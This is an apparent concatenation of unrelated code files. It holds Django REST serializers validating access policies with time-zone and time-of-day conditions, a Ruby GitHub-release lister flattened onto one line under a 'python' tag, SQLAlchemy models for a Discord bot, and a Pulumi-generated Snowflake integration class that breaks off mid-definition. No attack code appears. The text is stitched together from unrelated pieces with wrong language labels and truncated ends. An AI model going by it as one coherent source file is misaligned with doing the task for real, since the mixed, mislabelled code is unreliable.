class HMSEnvValueSLZ(EnvConditionValueSLZ):
    # "HH:MM:SS", 24-hour clock
    value = serializers.RegexField(label="环境属性值", regex=r"^([0-1][0-9]|(2[0-3])):([0-5][0-9]):([0-5][0-9])$")


# for validate
class TZEnvValueSLZ(EnvConditionValueSLZ):
    value = serializers.CharField(label="环境属性值")

    def validate(self, attrs):
        value = attrs["value"]
        if value not in pytz.all_timezones:
            # BUGFIX: the error was previously constructed but never raised,
            # so invalid time zone names slipped through validation.
            raise serializers.ValidationError({"value": ["{} is not a legal time zone representation".format(value)]})
        return attrs


class EnvConditionSLZ(serializers.Serializer):
    type = serializers.ChoiceField(label="环境属性条件类型", choices=PolicyEnvConditionTypeEnum.get_choices())
    values = serializers.ListField(label="条件的值", child=EnvConditionValueSLZ(label="VALUE"))


# for validate
class WeekdayEnvConditionSLZ(EnvConditionSLZ):
    values = serializers.ListField(
        label="条件的值", child=WeekdayEnvValueSLZ(label="VALUE"), allow_empty=False, min_length=1, max_length=7
    )

    def validate(self, attrs):
        # Each weekday may appear at most once.
        if len(attrs["values"]) != len({v["value"] for v in attrs["values"]}):
            raise serializers.ValidationError({"values": ["must not repeat"]})
        return attrs


# for validate
class HMSEnvConditionSLZ(EnvConditionSLZ):
    values = serializers.ListField(
        label="条件的值", child=HMSEnvValueSLZ(label="VALUE"), allow_empty=False, min_length=2, max_length=2
    )

    def validate(self, attrs):
        # The first time must be earlier than the second; with the zero-padded
        # HH:MM:SS format guaranteed above, plain string comparison is correct.
        if attrs["values"][0]["value"] >= attrs["values"][1]["value"]:
            raise serializers.ValidationError({"values": ["first hms must be smaller than the second"]})
        return attrs


# for validate
class TZEnvConditionSLZ(EnvConditionSLZ):
    values = serializers.ListField(
        label="条件的值", child=TZEnvValueSLZ(label="VALUE"), allow_empty=False, min_length=1, max_length=1
    )


class EnvironmentSLZ(serializers.Serializer):
    type = serializers.ChoiceField(label="环境属性类型", choices=PolicyEnvTypeEnum.get_choices())
    condition = serializers.ListField(label="生效条件", child=EnvConditionSLZ(label="条件"))


# Maps a condition type to the serializer that enforces its value rules.
ENV_COND_TYPE_SLZ_MAP = {
    PolicyEnvConditionTypeEnum.TZ.value: TZEnvConditionSLZ,
    PolicyEnvConditionTypeEnum.HMS.value: HMSEnvConditionSLZ,
    PolicyEnvConditionTypeEnum.WEEKDAY.value: WeekdayEnvConditionSLZ,
}


# for validate
class PeriodDailyEnvironmentSLZ(EnvironmentSLZ):
    condition = serializers.ListField(label="生效条件", child=EnvConditionSLZ(label="条件"), min_length=2, max_length=3)

    def validate(self, data):
        condition_type_set = {c["type"] for c in data["condition"]}
        # Condition types must not repeat.
        if len(data["condition"]) != len(condition_type_set):
            raise serializers.ValidationError({"condition": ["type must not repeat"]})

        # TZ and HMS are required; WEEKDAY is optional.
        if not (
            PolicyEnvConditionTypeEnum.TZ.value in condition_type_set
            and PolicyEnvConditionTypeEnum.HMS.value in condition_type_set
        ):
            raise serializers.ValidationError({"condition": ["tz and hms must be exists"]})

        # Re-validate each condition with its type-specific serializer.
        for c in data["condition"]:
            if c["type"] not in ENV_COND_TYPE_SLZ_MAP:
                raise serializers.ValidationError({"condition": ["type: {} not exists".format(c["type"])]})

            slz = ENV_COND_TYPE_SLZ_MAP[c["type"]](data=c)
            slz.is_valid(raise_exception=True)

        return data


ENV_TYPE_SLZ_MAP = {PolicyEnvTypeEnum.PERIOD_DAILY.value: PeriodDailyEnvironmentSLZ}


class ResourceGroupSLZ(serializers.Serializer):
    """A resource group: resource-type conditions plus optional environment conditions."""

    id = serializers.CharField(label="ID", allow_blank=True)
    related_resource_types = serializers.ListField(label="资源类型条件", child=ResourceTypeSLZ(label="资源类型"))
    environments = serializers.ListField(
        label="环境属性条件", child=EnvironmentSLZ(label="环境属性条件"), allow_empty=True, required=False, default=list
    )

    def validate(self, data):
        """
        Auto-fill resource_group_id when it is missing.
        """
        if not isinstance(data["id"], str) or not data["id"]:
            data["id"] = gen_uuid()

        # Re-validate each environment with its type-specific serializer.
        for e in data["environments"]:
            if e["type"] not in ENV_TYPE_SLZ_MAP:
                raise serializers.ValidationError({"environments": ["type: {} not exists".format(e["type"])]})

            slz = ENV_TYPE_SLZ_MAP[e["type"]](data=e)
            slz.is_valid(raise_exception=True)

        return data


class PolicySLZ(serializers.Serializer):
    type = serializers.CharField(label="操作类型")
    id = serializers.CharField(label="操作ID")
    tag = serializers.CharField(label="标签")
    policy_id = serializers.IntegerField(label="策略ID")
    name = serializers.CharField(label="操作名称", allow_blank=True)
    description = serializers.CharField(label="操作描述")
    expired_at = serializers.IntegerField(label="过期时间", max_value=PERMANENT_SECONDS)
    expired_display = serializers.CharField()
    resource_groups = serializers.ListField(label="资源条件组", child=ResourceGroupSLZ(label="资源条件组"))

    def validate(self, data):
        # A single policy must not contain multiple different time-zone
        # environment conditions across its resource groups.
        tz_set = set()
        for rg in data["resource_groups"]:
            for env in rg["environments"]:
                if env["type"] != PolicyEnvTypeEnum.PERIOD_DAILY.value:
                    continue

                for c in env["condition"]:
                    if c["type"] != PolicyEnvConditionTypeEnum.TZ.value:
                        continue

                    tz_set.add(c["values"][0]["value"])

        if len(tz_set) > 1:
            raise serializers.ValidationError(
                {"resource_groups": {"environments": ["all time zones must be consistent"]}}
            )

        return data


class PolicySystemSLZ(serializers.Serializer):
    id = serializers.CharField(label="系统ID")
    name = serializers.CharField(label="系统名称")
    count = serializers.IntegerField(label="权限数量")


class PolicyDeleteSLZ(serializers.Serializer):
    system_id = serializers.CharField(label="系统ID")
    ids = serializers.CharField(label="策略ID,多个以英文逗号分隔")

    def validate(self, data):
        # Validate the IDs and convert them to the list form the view expects.
        ids = data.get("ids") or ""
        if ids:
            try:
                data["ids"] = list(map(int, ids.split(",")))
            except Exception:  # pylint: disable=broad-except
                raise serializers.ValidationError({"ids": [f"策略IDS({ids})非法,策略ID只能是数字"]})
        return data


class ConditionDeleteSLZ(serializers.Serializer):
    id = serializers.CharField(label="条件id")
    instances = serializers.ListField(label="拓扑选择", child=InstanceSLZ(label="拓扑实例"))


class PolicyPartDeleteSLZ(serializers.Serializer):
    """Partial policy deletion: whole conditions by id, or parts of conditions."""

    system_id = serializers.CharField(label="资源类型系统ID")
    resource_group_id = serializers.CharField(label="资源条件组ID")
    type = serializers.CharField(label="资源类型")
    ids = serializers.ListField(label="整体删除的条件ID", child=serializers.CharField(label="ConditionID"), allow_empty=True)
    condition = serializers.ListField(label="部分删除条件", child=ConditionDeleteSLZ(label="条件"), allow_empty=True)

    def validate(self, data):
        if not data["ids"] and not data["condition"]:
            raise serializers.ValidationError({"condition": ["删除条件不能全为空"]})
        return data


class IDNameSLZ(serializers.Serializer):
    id = serializers.CharField()
    name = serializers.CharField()


class PolicyExpireSoonSLZ(serializers.Serializer):
    id = serializers.IntegerField(label="ID")
    system = IDNameSLZ(label="系统信息")
    action = IDNameSLZ(label="操作信息")
    expired_at = serializers.IntegerField(label="过期时间", max_value=PERMANENT_SECONDS)
    expired_display = serializers.CharField()


class BasePolicyActionSLZ(serializers.Serializer):
    id = serializers.CharField(label="操作ID")
    type = serializers.CharField(label="操作类型", allow_blank=True)
    resource_groups = serializers.ListField(label="资源条件组", child=ResourceGroupSLZ(label="资源条件组"))


class PolicyActionSLZ(BasePolicyActionSLZ):
    policy_id = serializers.IntegerField(label="策略id", required=False)
    expired_at = serializers.IntegerField(label="过期时间", max_value=PERMANENT_SECONDS)


class PolicyActionExpiredAtSLZ(BasePolicyActionSLZ):
    expired_at = serializers.IntegerField(label="过期时间", required=False, default=0, max_value=PERMANENT_SECONDS)


class RelatedPolicySLZ(serializers.Serializer):
    system_id = serializers.CharField(label="系统ID")
    source_policy = PolicyActionExpiredAtSLZ(label="来源策略")
    target_policies = serializers.ListField(
        label="操作策略", child=PolicyActionExpiredAtSLZ(label="策略"), required=False, default=list
    )


class PolicyResourceCopySLZ(serializers.Serializer):
    resource_type = ResourceTypeSLZ(label="资源")
    actions = serializers.ListField(label="目标操作", child=BaseAction(label="操作"), allow_empty=True)
python
#!/usr/bin/env ruby # usage: # ruby all-releases ipython jupyter jupyterlab jupyterhub # dependencies: # gem install netrc octokit activesupport faraday-http-cache # attribution: minrk require "rubygems" require "octokit" require "faraday-http-cache" require "active_support" # enable caching stack = Faraday::RackBuilder.new do |builder| store = ActiveSupport::Cache::FileStore.new "#{Dir.pwd}/cache" builder.use Faraday::HttpCache, serializer: Marshal, store: store, shared_cache: false builder.use Octokit::Response::RaiseError builder.adapter Faraday.default_adapter end Octokit.auto_paginate = true Octokit.middleware = stack github = Octokit::Client.new(:netrc => true) # csv header puts "Date, Org, Repo, Version" ARGV.each do |org_or_repo| if org_or_repo.include? '/' repos = [github.repo(org_or_repo)] else repos = github.repos(org_or_repo) end repos.each do |repo| tags = github.tags(repo.full_name) if not tags.empty? # human ouptut # puts "#{repo.full_name}: #{tags.length} releases" end tags.empty? or tags.each do |tag| v = tag.name # trim prefixes for old releases if v.start_with? 'rel-' v = v.slice(4, v.length) end if v.start_with? 'v' v = v.slice(1, v.length) end # exclude prereleases if v.match(/(b|a|rc|dev)\d*$/) # prerelease next end # exclude non-version tags (e.g. presentations for tutorials) if not v.match(/^\d+(\.\d+)*$/) # not a release next end commit = tag.commit.rels[:self].get.data.commit date = commit.committer.date # human output: # puts " #{v}: #{date.strftime '%Y-%m-%d'}" # csv output: puts "#{date.strftime '%Y-%m-%d'}, #{repo.owner.login}, #{repo.name}, #{v}" end end end
python
from time import sleep
import copy
import logging
import os

from disco.bot.command import CommandError
from disco.types.base import BitsetMap, BitsetValue
from sqlalchemy import (
    create_engine as spawn_engine,
    PrimaryKeyConstraint,
    Column,
    exc,
    ForeignKey,
)
from sqlalchemy.dialects.mysql import (
    TEXT,
    BIGINT,
    INTEGER,
    VARCHAR,
)
from sqlalchemy.engine.url import URL as SQLurl
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import (
    scoped_session,
    sessionmaker,
    relationship,
)

log = logging.getLogger(__name__)
Base = declarative_base()


class SQLexception(CommandError):
    """Raised when the database stays unreachable after retries; keeps the
    original driver exception for diagnostics."""

    def __init__(self, msg, original_exception):
        self.msg = msg
        self.original_exception = original_exception


class guilds(Base):
    """Per-guild settings (command prefix, lyrics limit, aliases)."""

    __tablename__ = "guilds"
    guild_id = Column(
        "guild_id",
        BIGINT(18, unsigned=True),
        nullable=False,
        primary_key=True,
    )
    prefix = Column(
        "prefix",
        TEXT,
        nullable=True,
    )
    lyrics_limit = Column(
        "lyrics_limit",
        INTEGER,
        nullable=True,
    )
    alias_list = relationship(
        "aliases",
        cascade="all, delete-orphan",
        backref="guilds",
    )

    def __init__(
            self,
            guild_id: int,
            prefix: str = None,
            lyrics_limit: int = None):
        self.guild_id = guild_id
        self.prefix = prefix
        self.lyrics_limit = lyrics_limit

    def __repr__(self):
        return (f"guilds {self.guild_id}")


# Maps a user-facing period shorthand (months, 0 = overall, 7 = 7 days)
# to the last.fm period string.
periods = {
    0: "overall",
    7: "7day",
    1: "1month",
    3: "3month",
    6: "6month",
    12: "12month",
}


class users(Base):
    """Per-user settings (cached username, default chart period)."""

    __tablename__ = "users"
    user_id = Column(
        "user_id",
        BIGINT(18, unsigned=True),
        nullable=False,
        primary_key=True,
    )
    last_username = Column(
        "last_username",
        TEXT,
        nullable=True,
    )
    period = Column(
        "period",
        INTEGER,
        nullable=True,
    )
    friends = relationship(
        "friends",
        cascade="all, delete-orphan",
        backref="users",
    )
    aliases = relationship(
        "aliases",
        cascade="all, delete-orphan",
        backref="users",
    )

    def __init__(
            self,
            user_id: int,
            last_username: str = None,
            period: int = None):
        self.user_id = user_id
        self.last_username = last_username
        self.period = period

    def __repr__(self):
        return f"users({self.user_id}: {self.last_username})"


class friends(Base):
    """Directed friendship link: master follows slave."""

    __tablename__ = "friends"
    __table_args__ = (
        PrimaryKeyConstraint(
            "master_id",
            "slave_id",
        ),
    )
    master_id = Column(
        "master_id",
        BIGINT(18, unsigned=True),
        ForeignKey(users.user_id, ondelete="CASCADE"),
        nullable=False,
    )
    slave_id = Column(
        "slave_id",
        BIGINT(18, unsigned=True),
        nullable=False,
    )

    def __init__(self, master_id: int, slave_id: int, index: int = None):
        self.master_id = master_id
        self.slave_id = slave_id

    def __repr__(self):
        return f"users({self.master_id} : {self.slave_id})"


class aliases(Base):
    """Per-guild alias pointing at a user."""

    __tablename__ = "aliases"
    __table_args__ = (
        PrimaryKeyConstraint(
            "guild_id",
            "alias",
        ),
    )
    user_id = Column(
        "user_id",
        BIGINT(18, unsigned=True),
        ForeignKey(users.user_id, ondelete="CASCADE"),
        nullable=False,
    )
    guild_id = Column(
        "guild_id",
        BIGINT(18, unsigned=True),
        ForeignKey(guilds.guild_id, ondelete="CASCADE"),
        nullable=False,
    )
    alias = Column(
        "alias",
        VARCHAR(30),
        nullable=False,
    )

    def __init__(self, user_id, guild_id, alias):
        self.user_id = user_id
        self.guild_id = guild_id
        self.alias = alias

    def __repr__(self):
        return f"aliases({self.guild_id}: {self.alias})"


class Filter_Status(BitsetValue):
    """Bitset wrapper for filter state (whitelisted / blacklisted flags)."""

    class map(BitsetMap):
        WHITELISTED = 1 << 0
        BLACKLISTED = 1 << 1
        _all = {"WHITELISTED": WHITELISTED, "BLACKLISTED": BLACKLISTED}

    def __int__(self):
        return self.value


class filter_types:
    """Enumeration of filter target kinds plus state lookup helpers."""

    USER = 0
    GUILD = 1
    DM = 2
    # target_type -> (human name, attribute path on the client state
    # used to resolve the target object)
    _type_associations = {
        USER: ("user", ("guilds", "get")),
        DM: ("channel", ("channels", "get")),
        GUILD: ("guild", ("guilds", "get")),
    }

    @staticmethod
    def get(state, target, target_type):
        target_type = getattr(filter_types, target_type.upper(), None)
        result = filter_types._type_associations.get(target_type, None)
        if not result:
            raise CommandError("Invalid type.")

        key, path = result
        # Walk the attribute path (e.g. state.guilds.get) and resolve the id.
        for attr in path:
            state = getattr(state, attr)
        target = state(target)
        if not target:
            raise CommandError(f"{key.capitalize()} not found.")
        return key, target


class cfilter(Base):
    """Filter row: whitelist/blacklist status for a user, guild or DM."""

    __tablename__ = "filter"
    __table_args__ = (
        PrimaryKeyConstraint(
            "target",
            "target_type",
        ),
    )
    target = Column(
        "target",
        BIGINT(18, unsigned=True),
        nullable=False,
    )
    target_type = Column(
        "target_type",
        INTEGER(1, unsigned=True),
        nullable=False,
    )
    status = Column(
        "status",
        INTEGER(1, unsigned=True),
        nullable=False,
    )

    def __init__(self, status=0, channel=None, guild=None, user=None):
        data = self._search_kwargs(channel=channel, guild=guild, user=user)
        self.target = data["target"]
        self.target_type = data["target_type"]
        self.status = int(status)

    @staticmethod
    def _search_kwargs(channel=None, guild=None, user=None, **kwargs):
        """Derive (target, target_type) from whichever object was passed.

        A non-DM channel resolves to its guild; exactly one of channel,
        guild or user must be given.
        """
        if not (channel or user or guild):
            raise TypeError("Missing targeted object.")

        if channel:
            if channel.is_dm:
                target = channel.id
                target_type = filter_types.DM
            else:
                target = channel.guild_id
                target_type = filter_types.GUILD
        elif user:
            target = user.id
            target_type = filter_types.USER
        elif guild:
            target = guild.id
            target_type = filter_types.GUILD
        return {"target": target, "target_type": target_type}

    @classmethod
    def _get_wrapped(cls, *args, **kwargs):
        return wrappedfilter(cls(*args, **kwargs))

    @staticmethod
    def _wrap(obj):
        return wrappedfilter(obj)

    def __repr__(self):
        return f"filter_status({self.target})"


class wrappedfilter:
    """Convenience wrapper around a cfilter row exposing bitset helpers."""

    __slots__ = ("filter", "_status")

    def __init__(self, cfilter):
        self.filter = cfilter

    def __repr__(self):
        return f"wrapped({self.filter})"

    @property
    def status(self):
        # Lazily build and cache the Filter_Status view of the raw int.
        if not hasattr(self, "_status"):
            if hasattr(self, "filter") and self.filter.status:
                value = self.filter.status
            else:
                value = 0
            self._status = Filter_Status(value)
        return self._status

    def edit_status(self, value):
        # Keep the row and the cached bitset in sync.
        self.filter.status = int(value)
        self.status.value = int(value)

    def blacklist_status(self):
        return self.status.blacklisted

    def whitelist_status(self):
        # Explicitly whitelisted, or no whitelist exists at all for this
        # target type (open-by-default semantics).
        if self.status.whitelisted:
            return True
        return not self.get_count(
            Filter_Status.map.WHITELISTED,
            target_type=self.filter.target_type,
        )

    def get_count(self, status, target_type=None, sql_obj=None):
        """Count filter rows that have all `status` bits set, optionally
        restricted to one target type.

        BUGFIX: this previously referenced the *builtin* ``filter``
        (``filter.status`` -> AttributeError) instead of the ``cfilter``
        model, and combined the clauses with Python ``and``, which
        truth-tests the clause objects instead of emitting SQL — the
        target_type restriction was silently dropped.
        """
        query = (sql_obj or self.filter).query.filter(
            cfilter.status.op("&")(status) == status)
        if target_type is not None:
            query = query.filter(cfilter.target_type == target_type)
        return query.count()


class sql_instance:
    """Owns the engine + scoped session and exposes query-enabled copies of
    the model classes as attributes (e.g. ``instance.users.query``)."""

    __tables__ = (
        guilds,
        users,
        friends,
        aliases,
        cfilter,
    )
    autocommit = True
    autoflush = True
    session = None
    engine = None
    # Attribute paths (starting from self.session.connection()) used to
    # probe whether the underlying DBAPI connection uses SSL.
    _driver_ssl_checks = {
        "pymysql": ("connection", "connection", "ssl"),
        "psycopg2": ("connection", "connection", "info", "ssl_in_use"),
    }

    def __init__(
            self,
            drivername=None,
            host=None,
            port=None,
            username=None,
            password=None,
            database=None,
            query=None,
            args=None,
            local_path=None):
        self.session, self.engine = self.create_engine_session_safe(
            drivername,
            host,
            port,
            username,
            password,
            database,
            query,
            args,
            local_path,
        )
        self.check_tables()
        self.spwan_binded_tables()

    @staticmethod
    def __call__(function, *args, **kwargs):
        """Run a session operation, retrying transient OperationalErrors
        up to 5 times (2s back-off) before surfacing an SQLexception."""
        tries = 0
        root_exception = None
        while True:
            if tries >= 5:
                raise SQLexception(
                    "Failed to access data.",
                    root_exception,
                )
            try:
                return function(*args, **kwargs)
            except exc.OperationalError as e:
                sleep(2)
                tries += 1
                root_exception = e

    # NOTE: misspelled name kept for interface compatibility.
    def spwan_binded_tables(self):
        # Attach a query property bound to this instance's session onto a
        # copy of each model, so models stay usable with other sessions.
        for table in self.__tables__:
            table_copy = copy.deepcopy(table)
            table_copy.query = self.session.query_property()
            setattr(self, table.__tablename__, table_copy)

    @staticmethod
    def check_engine_table(table, engine):
        if not engine.dialect.has_table(engine, table.__tablename__):
            log.info(f"Creating table {table.__tablename__}")
            table.__table__.create(engine)

    def check_tables(self):
        for table in self.__tables__:
            self.check_engine_table(table, self.engine)

    @staticmethod
    def softget(obj, *args, **kwargs):
        """Fetch an existing row matching the kwargs or build an unsaved
        instance; returns (object, found_in_db)."""
        if hasattr(obj, "_search_kwargs"):
            search_kwargs = obj._search_kwargs(*args, **kwargs)
        else:
            search_kwargs = kwargs
        data = obj.query.filter_by(**search_kwargs).first()
        if data:
            return obj._wrap(data) if hasattr(obj, "_wrap") else data, True

        obj = (getattr(obj, "_get_wrapped", None) or obj)(*args, **kwargs)
        return obj, False

    def add(self, object):
        self(self.session.add, object)
        self.flush()

    def delete(self, object):
        self(self.session.delete, object)
        self.flush()

    def flush(self):
        self(self.session.flush)

    def commit(self):
        self(self.session.commit)
        self.flush()

    def ssl_check(self):
        """Log (and return) whether the live DBAPI connection uses SSL;
        returns None when the driver is unknown."""
        driver = self.session.connection().engine.driver
        check_map = self._driver_ssl_checks.get(driver)
        if not check_map:
            log.warning(f"Unknown engine {driver}, unable to get ssl status")
            return

        position = self.session.connection()
        for attr in check_map:
            if not position:
                break
            position = getattr(position, attr, None)
        log.info(f"SQL SSL status: {position or 'unknown'}")
        return position

    @staticmethod
    def create_engine(
            drivername=None,
            host=None,
            port=None,
            username=None,
            password=None,
            database=None,
            query=None,
            args=None,
            local_path=None):
        # Pre_establish settings
        if host:
            settings = SQLurl(
                drivername,
                username,
                password,
                host,
                port,
                database,
                query,
            )
            args = (args or {})
        else:
            # No host given: fall back to a local sqlite file.
            if not os.path.exists("data"):
                os.makedirs("data")
            args = {}
            settings = f"sqlite+pysqlite:///{local_path or 'data/data.db'}"

        # Connect to server
        return spawn_engine(
            settings,
            encoding="utf8",
            pool_recycle=3600,
            pool_pre_ping=True,
            echo=False,
            connect_args=args,
        )

    def create_engine_session_safe(
            self,
            drivername=None,
            host=None,
            port=None,
            username=None,
            password=None,
            database=None,
            query=None,
            args=None,
            local_path=None):
        """Build engine + scoped session, falling back to sqlite when the
        configured server is unreachable."""
        engine = self.create_engine(
            drivername,
            host,
            port,
            username,
            password,
            database,
            query,
            args,
            local_path,
        )

        # Verify connection.
        try:
            engine.execute("SELECT 1")
        except exc.OperationalError as e:
            log.warning("Unable to connect to database, "
                        "defaulting to sqlite: " + str(e))
            engine = self.create_engine(local_path=local_path)

        session = scoped_session(
            sessionmaker(
                autocommit=self.autocommit,
                autoflush=self.autoflush,
                bind=engine,
            ),
        )
        return session, engine
python
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from . import _utilities __all__ = ['ApiIntegrationArgs', 'ApiIntegration'] @pulumi.input_type class ApiIntegrationArgs: def __init__(__self__, *, api_allowed_prefixes: pulumi.Input[Sequence[pulumi.Input[str]]], api_provider: pulumi.Input[str], api_aws_role_arn: Optional[pulumi.Input[str]] = None, api_blocked_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, azure_ad_application_id: Optional[pulumi.Input[str]] = None, azure_tenant_id: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None): """ The set of arguments for constructing a ApiIntegration resource. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_allowed_prefixes: Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. :param pulumi.Input[str] api_provider: Specifies the HTTPS proxy service type. :param pulumi.Input[str] api_aws_role_arn: ARN of a cloud platform role. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_blocked_prefixes: Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. :param pulumi.Input[str] azure_ad_application_id: The 'Application (client) id' of the Azure AD app for your remote service. :param pulumi.Input[str] azure_tenant_id: Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. :param pulumi.Input[bool] enabled: Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. 
:param pulumi.Input[str] name: Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. """ pulumi.set(__self__, "api_allowed_prefixes", api_allowed_prefixes) pulumi.set(__self__, "api_provider", api_provider) if api_aws_role_arn is not None: pulumi.set(__self__, "api_aws_role_arn", api_aws_role_arn) if api_blocked_prefixes is not None: pulumi.set(__self__, "api_blocked_prefixes", api_blocked_prefixes) if azure_ad_application_id is not None: pulumi.set(__self__, "azure_ad_application_id", azure_ad_application_id) if azure_tenant_id is not None: pulumi.set(__self__, "azure_tenant_id", azure_tenant_id) if enabled is not None: pulumi.set(__self__, "enabled", enabled) if name is not None: pulumi.set(__self__, "name", name) @property @pulumi.getter(name="apiAllowedPrefixes") def api_allowed_prefixes(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]: """ Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. """ return pulumi.get(self, "api_allowed_prefixes") @api_allowed_prefixes.setter def api_allowed_prefixes(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]): pulumi.set(self, "api_allowed_prefixes", value) @property @pulumi.getter(name="apiProvider") def api_provider(self) -> pulumi.Input[str]: """ Specifies the HTTPS proxy service type. """ return pulumi.get(self, "api_provider") @api_provider.setter def api_provider(self, value: pulumi.Input[str]): pulumi.set(self, "api_provider", value) @property @pulumi.getter(name="apiAwsRoleArn") def api_aws_role_arn(self) -> Optional[pulumi.Input[str]]: """ ARN of a cloud platform role. 
""" return pulumi.get(self, "api_aws_role_arn") @api_aws_role_arn.setter def api_aws_role_arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "api_aws_role_arn", value) @property @pulumi.getter(name="apiBlockedPrefixes") def api_blocked_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. """ return pulumi.get(self, "api_blocked_prefixes") @api_blocked_prefixes.setter def api_blocked_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "api_blocked_prefixes", value) @property @pulumi.getter(name="azureAdApplicationId") def azure_ad_application_id(self) -> Optional[pulumi.Input[str]]: """ The 'Application (client) id' of the Azure AD app for your remote service. """ return pulumi.get(self, "azure_ad_application_id") @azure_ad_application_id.setter def azure_ad_application_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_ad_application_id", value) @property @pulumi.getter(name="azureTenantId") def azure_tenant_id(self) -> Optional[pulumi.Input[str]]: """ Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. """ return pulumi.get(self, "azure_tenant_id") @azure_tenant_id.setter def azure_tenant_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "azure_tenant_id", value) @property @pulumi.getter def enabled(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. """ return pulumi.get(self, "enabled") @enabled.setter def enabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "enabled", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ Specifies the name of the API integration. This name follows the rules for Object Identifiers. 
The name should be unique among api integrations in your account. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @pulumi.input_type class _ApiIntegrationState: def __init__(__self__, *, api_allowed_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_aws_external_id: Optional[pulumi.Input[str]] = None, api_aws_iam_user_arn: Optional[pulumi.Input[str]] = None, api_aws_role_arn: Optional[pulumi.Input[str]] = None, api_blocked_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, api_provider: Optional[pulumi.Input[str]] = None, azure_ad_application_id: Optional[pulumi.Input[str]] = None, azure_consent_url: Optional[pulumi.Input[str]] = None, azure_multi_tenant_app_name: Optional[pulumi.Input[str]] = None, azure_tenant_id: Optional[pulumi.Input[str]] = None, created_on: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering ApiIntegration resources. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_allowed_prefixes: Explicitly limits external functions that use the integration to reference one or more HTTPS proxy service endpoints and resources within those proxies. :param pulumi.Input[str] api_aws_external_id: The external ID that Snowflake will use when assuming the AWS role. :param pulumi.Input[str] api_aws_iam_user_arn: The Snowflake user that will attempt to assume the AWS role. :param pulumi.Input[str] api_aws_role_arn: ARN of a cloud platform role. :param pulumi.Input[Sequence[pulumi.Input[str]]] api_blocked_prefixes: Lists the endpoints and resources in the HTTPS proxy service that are not allowed to be called from Snowflake. :param pulumi.Input[str] api_provider: Specifies the HTTPS proxy service type. 
:param pulumi.Input[str] azure_ad_application_id: The 'Application (client) id' of the Azure AD app for your remote service. :param pulumi.Input[str] azure_tenant_id: Specifies the ID for your Office 365 tenant that all Azure API Management instances belong to. :param pulumi.Input[str] created_on: Date and time when the API integration was created. :param pulumi.Input[bool] enabled: Specifies whether this API integration is enabled or disabled. If the API integration is disabled, any external function that relies on it will not work. :param pulumi.Input[str] name: Specifies the name of the API integration. This name follows the rules for Object Identifiers. The name should be unique among api integrations in your account. """ if api_allowed_prefixes is not None: pulumi.set(__self__, "api_allowed_prefixes", api_allowed_prefixes) if api_aws_external_id is not None: pulumi.set(__self__, "api_aws_external_id", api_aws_external_id) if api_aws_iam_user_arn is not None: pulumi.set(__self__, "api_aws_iam_user_arn", api_aws_iam_user_arn) if api_aws_role_arn is not None: pulumi.set(__self__, "api_aws_role_arn", api_aws_role_arn) if api_blocked_prefixes is not None: pulumi.set(__self__, "api_blocked_prefixes", api_blocked_prefixes) if api_provider is not None: pulumi.set(__self__, "api_provider", api_provider) if azure_ad_application_id is not None: pulumi.set(__self__, "azure_ad_application_id", azure_ad_application_id) if azure_consent_url is not None: pulumi.set(__self__, "azure_consent_url", azure_consent_url) if azure_multi_tenant_app_name is not None: pulumi.set(__self__, "azure_multi_tenant_app_name", azure_multi_tenant_app_name) if azure_tenant_id is not None: pulumi.set(__self__, "azure_tenant_id", azure_tenant_id) if created_on is not None: pulumi.set(__self__, "created_on", created_on) if enabled is not None: pulumi.set(__self__, "enabled", enabled) if name is not None: pulumi.set(__self__, "name", name) @property @pulumi.getter(name="apiAllowedPrefixes") def 
